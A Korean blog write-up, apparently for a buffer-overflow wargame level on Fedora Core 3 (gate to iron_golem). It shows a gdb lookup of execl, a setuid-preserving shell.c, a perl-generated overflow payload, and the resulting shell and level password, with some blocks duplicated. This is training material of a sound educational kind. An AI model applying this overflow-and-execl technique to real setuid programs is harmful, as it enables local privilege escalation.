Fedora Core3이라 Ascii-Armor이 적용 되서, 인자를 주기가 매우 어려워졌다.
그래서, Fake EBP기법이나 RET을 이용해서 인자를 맞춰주기로 했다.
(gdb) p execl
$1 = {<text variable, no debug info>} 0x7a5720 <execl>
$1 = {<text variable, no debug info>} 0x7a5720 <execl>
아스키아머가 적용된 execl함수의 주소다.
그런데 오현이형이 말씀해주신 바로는
./iron_golem `perl -e 'print "a"x264,"\x10\x96\x04\x08","\x23\x57\x7a"'`
이런 식으로 페이로드를 짜면 안된다고 말씀해주셨다.
쉘을 띄우는 역할을 담당하는 shell.c를 만들어 놓고 컴파일 한 뒤, 페이로드 상에서 execl로 실행시켜주는 식이었다.
=====================================================
#include <stdio.h>
int main()
{
setreuid(geteuid(),geteuid());
setregid(getegid(),getegid());
execl("/bin/sh","sh",0);
}
int main()
{
setreuid(geteuid(),geteuid());
setregid(getegid(),getegid());
execl("/bin/sh","sh",0);
}
[gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x264,"\x10\x96\x04\x08","\x23\x57\x7a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?#Wz
sh-3.00$ id
uid=501(iron_golem) gid=501(iron_golem) groups=500(gate) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 501
blood on the fedora
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?#Wz
sh-3.00$ id
uid=501(iron_golem) gid=501(iron_golem) groups=500(gate) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 501
blood on the fedora
'Wargame > LOB (Fedora3)' 카테고리의 다른 글
| evil_wizard ->dark_stone (0) | 2014.02.24 |
|---|---|
| hell_fire -> evil_wizard (0) | 2014.02.20 |
| dark_eyes -> hell_fire (1) | 2014.02.20 |
| iron_golem -> dark_eyes (0) | 2014.02.20 |
